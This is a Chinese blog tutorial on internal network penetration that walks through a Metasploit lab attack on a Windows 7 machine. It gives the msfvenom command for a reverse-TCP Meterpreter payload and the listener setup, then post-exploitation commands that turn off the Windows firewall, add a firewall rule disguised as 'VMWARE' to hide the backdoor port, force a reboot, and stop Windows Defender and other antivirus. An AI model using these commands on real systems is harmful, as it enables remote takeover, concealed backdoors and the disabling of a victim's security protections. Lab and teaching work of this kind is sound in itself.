当前位置:网站首页>内网渗透之内网信息收集(一)
内网渗透之内网信息收集(一)
2022-07-06 09:22:00 【不知名白帽】
目录
内网渗透之内网信息收集(二)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit

将payload发送到目标机器让其执行

执行成功

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)

通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
边栏推荐
- It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
- HackMyvm靶机系列(5)-warez
- 7-1 输出2到n之间的全部素数(PTA程序设计)
- . Net6: develop modern 3D industrial software based on WPF (2)
- Which is more advantageous in short-term or long-term spot gold investment?
- 7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
- Experiment 7 use of common classes (correction post)
- 扑克牌游戏程序——人机对抗
- FAQs and answers to the imitation Niuke technology blog project (I)
- 实验四 数组
猜你喜欢

canvas基础1 - 画直线(通俗易懂)

7-7 7003 组合锁(PTA程序设计)

强化学习基础记录

Nuxtjs quick start (nuxt2)

Hackmyvm target series (3) -visions

FAQs and answers to the imitation Niuke technology blog project (II)

网络层—简单的arp断网

The difference between cookies and sessions

【VMware异常问题】问题分析&解决办法
![[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i](/img/d7/4671b5a74317a8f87ffd36be2b34e1.jpg)
[dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
随机推荐
Safe driving skills on ice and snow roads
7-5 staircase upgrade (PTA program design)
记一次猫舍由外到内的渗透撞库操作提取-flag
Poker game program - man machine confrontation
JS several ways to judge whether an object is an array
TypeScript快速入门
SRC挖掘思路及方法
7-7 7003 组合锁(PTA程序设计)
QT meta object qmetaobject indexofslot and other functions to obtain class methods attention
Implementation of count (*) in MySQL
Brief introduction to XHR - basic use of XHR
Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
Using spacedesk to realize any device in the LAN as a computer expansion screen
Leetcode. 3. Longest substring without repeated characters - more than 100% solution
.Xmind文件如何上传金山文档共享在线编辑?
7-11 机工士姆斯塔迪奥(PTA程序设计)
7-6 矩阵的局部极小值(PTA程序设计)
渗透测试学习与实战阶段分析
Get started with typescript
[during the interview] - how can I explain the mechanism of TCP to achieve reliable transmission